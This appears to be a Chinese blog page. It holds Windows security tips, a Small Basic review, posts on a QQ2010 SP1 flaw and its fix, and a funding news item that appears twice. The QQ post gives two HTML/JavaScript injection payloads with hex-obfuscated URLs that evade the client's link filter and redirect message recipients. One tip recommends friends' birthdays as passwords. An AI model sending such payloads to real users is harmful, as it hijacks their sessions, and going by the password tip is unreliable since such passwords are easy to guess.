[转]Windows安全最高境界

最少的服务+最少的端口开放=最安全的系统 对于不是很了解系统的朋友,推荐以下方法:

1、必须安装防火墙和杀毒软件

虽然在面对新病毒时,杀毒软件会变得手足无措,倒不如自己上网找杀毒办法。但有一个杀毒软件就是多了一道屏障,不管这道屏障有多高或多矮,始终是利大于弊的。

防火墙也是必须要安装的,同时最好还安装一些监测网络进程的程序,时刻监视有无恶意程序在进行非法操作。

2、为Administrator用户降权

在Windows操作系统里,Administrator是最高级的用户,在正常的登陆模式是无法看到的,因此很容易忽略由Administrator用户带来的安全问题。

Administrator用户的初始密码是空的,如果没用安装防火墙,黑客很容易通过Administrator帐户进入你的电脑。这时做什么都已经为时已晚了。

事实上,这并不是降权,是创建一个伪造的,无实际权利的Administrator用户。

具体操作如下,先以一个非Administrator的管理员帐户登陆windows,然后打开:控制面板-管理工具-计算机管理-本地用户和组-用户,删除Administrator用户,再创建一个新的Administrator用户,右击设置密码,密码有多复杂就多复杂,让其隶属于最低级别的用户组,并在属性里勾选帐户已停用。

这样,即使别人破解了你的Administrator帐户,进入后也发现只是一个没用实权的帐户。其实直接删除掉这个用户就行了。网上都出这种方法,浪费感情和时间。

3、禁止所有磁盘自动运行

如今U盘病毒盛行,稍不小心就会导致“格盘”。U盘病毒一般的运行机制是通过双击盘符自动运行,因此,禁用所有磁盘的自动运行是一种相当有效的预防手段。

具体的操作过程是:运行输入gpedIT.msc–>用户配置–>管理模板–>系统,双击右侧列表里的【关闭自动播放】,选择“所有驱动器”,然后选择“已启动”。确定退出。关掉自动播放所用到的一个服务

运行–>services.msc–>Shell Hardware Detection服务–>启动类型–>禁用

4、不双击U盘

如果你没用禁止所有磁盘自动运行,又或者你在别人的计算机上使用U盘,最好不要双击U盘。这很容易触发U盘病毒,最好的方法是先用杀毒软件扫描。

U盘里的病毒一般清除方法是,通过资源管理器进去看看U盘里有无autorun.inf文件,通常是隐藏的。删除autorun.inf文件以及它所指向的程序,然后重新拔插U盘。

5、经常检查开机启动项

经常在运行里输入msconfig查看启动项,发现有异常的马上在网上找资料,看看是不是病毒。再就是使用regedit。找到run项,检查启动项目。不过,现在360已经有一个启动项目管理,还能查看一些系统偷偷启动的东东。哈哈

6、经常备份重要数据

一些重要的数据,必须经常备份,例如重要的图片、个人信息等等。大概一个月会刻录一次重要的资料,以防万一。

7、使用Ghost

经常使用Ghost备份操作系统盘,遇到严重问题时直接恢复整个系统盘,这是懒人的做法,懒得找病毒的隐藏地,但同时也是高效快捷的方法。问题是你必须经常使用Ghost进行备份,不然你恢复系统盘也会有所损失,至少损失了最近安装的程序(的注册信息)。

8、隐私文件要加密

使用一些加密程序加密那些你认为不能***于公众的文件,网上有很多这样的免费软件。不要以为隐藏了文件就行,隐藏只是一种自欺欺人的方式,加密了。

9、使用Google

因为Google搜索里提供的网站安全信息提示。当搜索结果的某网页里含有病毒或木马时,Google会给出提示。相信国产BAIDU也会越越好。

10、使用其它浏览器

比如360安全浏览器,不是万能的,但总比IE好,相比起IE,使用其它浏览器能有效地降低中毒几率。

11、使用复杂的密码

这是老生常谈的话题了,但还有很多人使用简单的数字密码,例如生日、身份证号等等,这是极容易被猜测的。“放心,我的生日只有我的朋友知道”,谁说你的朋友一定不会窥看你的隐私?哈哈,其实告诉大家一个小方法,用朋友的生日,身份证号等等。

12、不要告诉任何人你的密码

告诉别人就相当于自己出卖了自己。

13、不要随便接收文件

尤其是在QQ里,别人发来文件,不要二话不说就接收,这是很危险的。不认识的马上拒绝。是朋友的话一定要问清楚是他主动发的。接收后也不要马上运行,先用杀毒软件扫描一遍。还有就是网站类的。

做到以上的,估计你已经算是个半仙了。以后多学习多努力,就离神仙不远了。哈哈。

http://technet.microsoft.com/zh-cn/library/ff629043.aspx

Visual Basic的孩子:Small Basic简易测评

1、序

Small Basic,一款针对儿童的免费编程语言。不像Scratch和Alice,这款工具属于“无编码”环境,本质上讲是一个简略版本的BASIC语言。
该语言脱胎于传统的BASIC语言,但是基于.Net开发框架重新建立。它有三个显著特点:

语言
只包含14个关键词,Small Basic是完全基于.Net开发框架运行的。

环境
Small Basic的开发环境非常简单,但是提供了只有专业开发人员才能使用的包含智能感知的IDE。


Small Basic有一系列的开发库,并允许用户创建新的库或者修改现有的。它还允许加在第三方开发库。

我们身为一个新时代的程序员,不仅仅学习最普片的C、VB、Delphi、java、C#等热门语言。我们还需要关注一些入门级,轻量级的新语言,在做项目时可以灵活运用。达到快速开发。新语言带给新思维。我们也可以用新的思维来带给工作新乐趣。

2、界面

Small Basic是一个儿童学习语言,界面非常简洁。有一些简洁得让人害怕。

image

image

虽说界面整洁。但是外观看上去比所有编程语言更要漂亮。

3、语法对比

Small Basic Visual Basic
Dim 不需要定义
For…next For…endfor

在初步看上去,与VB语言仅仅相差一些。

SB语言在界面上可以分为2种

TextWindow、GraphicsWindow 故名思意,TextWdinow 是我们传统看到的DOS窗口,Graphics就是一个可供绘图的“画画板”

image

一个绘制在windows窗口的Hello World。

image

一个时钟显示程序

 

4、总结

由于SB是一个入门级语言,他能做的功能有限。我们完全可以让他做一个小游戏。因为他的游戏控制和游戏绘图方面比较强大。可以看做一个XNA的简化版。这一个或许是微软用来吸引小朋友学习的原动力吧。

腾讯QQ2010Sp1漏洞悄然修复

image

从图中可以看到MsgMgr.dll是元凶,已经在14:02:54秒重新签名,而CNbeta发布时间为12:30:56,漏洞提交给腾讯为早上9点。

腾讯的危机应急能力很高。在14:56:32秒已经打包新版本并在首页提供下载。

 

一个小风波就在几个小时静悄悄的来,静悄悄的走了。

 

希望腾讯以后也不要犯低级错误咯。。

如果还发现有Bug,可以重新下载QQ2010 SP1

QQ腾讯2010Sp1首发严重漏洞

腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010Sp1竟然有如此大漏洞。

##脚本出错还会提示

image

 

1、消息记录的Javascript、Html标签没有屏蔽

image

2、消息盒子Javascript、Html标签没有屏蔽

image

 

3、小实验

1、发送代码:<input onclick="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’" />

 

因为腾讯会自动将url转换,我们必须混淆url才能发送

 

image

image

image

4、超牛代码

<img src=’tetet’ onerror="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’"/>

因为要点击才能触发,想到一个不用点击就能触发的代码。

 

 

5、希望腾讯快点修复,这个漏洞非同小可

 

6、本漏洞由TGL发现。

 

注意,本代码仅供研究之用,请勿用于违法事情。

好帮家家政网获融资800万

当SNS网站、电子商务网站、视频网站一轮融资的喧嚣过后,越来越多的分类信息网引起了资本市场的注意,这标志着实用性网站已经进入了人们生活当中。近日,好帮家家政网(www.homekey.cn)获第一轮投资800万元。据了解,好帮家家政网是厦门优网科技有限公司旗下网站,收录量高达180000页,注册会员120000余人,好帮家网站巧妙的避开同城58,赶集网,口碑网,百姓网等分类信息大鳄,打造以保姆、家政、保健服务、家庭教育为主题的家政服务网站。

  分类信息网前景

  分类信息网以方便、快捷、全面、免费逐渐被人们所接受,也引起了更多的互联网企业和草根站长的重视,不论是赶集网、口碑网这些分类大鳄,还是各地区的草根站长的信息网,都能看出来现在分类信息网的热度,分类信息网也逐渐代替了报纸,成为人们生活必不可少的一部分。目前,国内分类信息网更多以房屋出租出售、招聘求职为发展重心,对于一些家政类的信息却不太重视,好帮家家政网抓住市场空白,迅速抢占先机,如今已成为家政类信息网领头网站。

  分类信息网盈利模式

  好帮家家政网CEO林东梁介绍,前两年,分类信息网还不被人们所重视,各大分类信息网站也是在探索阶段,并没有形成一个良好的盈利模式,网站初期,为了更好发展,快速提高网站知名度,投入了大量资金,几乎每个月要赔钱来经营,近年来,分类信息网逐渐被人们所喜爱,网站人气也呈几何式递增,网站从月收入几千元到现在十几的万元,真正的进入了盈利期,林栋梁还表示,好帮家家政网发布与查看信息仍然免费,这个不会改变,也是分类信息的一大形式。收入大部分来源于广告及企业服务,真正实现了企业与网站双赢。

  对于作者问及本次融资后的打算,林东梁表示,将会利用此笔资金推进好帮家家政网的知名度,真正做到关注于家庭、服务于家庭的家政网。

当SNS网站、电子商务网站、视频网站一轮融资的喧嚣过后,越来越多的分类信息网引起了资本市场的注意,这标志着实用性网站已经进入了人们生活当中。近日,好帮家家政网(www.homekey.cn)获第一轮投资800万元。据了解,好帮家家政网是厦门优网科技有限公司旗下网站,收录量高达180000页,注册会员120000余人,好帮家网站巧妙的避开同城58,赶集网,口碑网,百姓网等分类信息大鳄,打造以保姆、家政、保健服务、家庭教育为主题的家政服务网站。

  分类信息网前景

  分类信息网以方便、快捷、全面、免费逐渐被人们所接受,也引起了更多的互联网企业和草根站长的重视,不论是赶集网、口碑网这些分类大鳄,还是各地区的草根站长的信息网,都能看出来现在分类信息网的热度,分类信息网也逐渐代替了报纸,成为人们生活必不可少的一部分。目前,国内分类信息网更多以房屋出租出售、招聘求职为发展重心,对于一些家政类的信息却不太重视,好帮家家政网抓住市场空白,迅速抢占先机,如今已成为家政类信息网领头网站。

  分类信息网盈利模式

  好帮家家政网CEO林东梁介绍,前两年,分类信息网还不被人们所重视,各大分类信息网站也是在探索阶段,并没有形成一个良好的盈利模式,网站初期,为了更好发展,快速提高网站知名度,投入了大量资金,几乎每个月要赔钱来经营,近年来,分类信息网逐渐被人们所喜爱,网站人气也呈几何式递增,网站从月收入几千元到现在十几的万元,真正的进入了盈利期,林栋梁还表示,好帮家家政网发布与查看信息仍然免费,这个不会改变,也是分类信息的一大形式。收入大部分来源于广告及企业服务,真正实现了企业与网站双赢。

  对于作者问及本次融资后的打算,林东梁表示,将会利用此笔资金推进好帮家家政网的知名度,真正做到关注于家庭、服务于家庭的家政网。

Subscribe to RSS Feed Follow me on Twitter!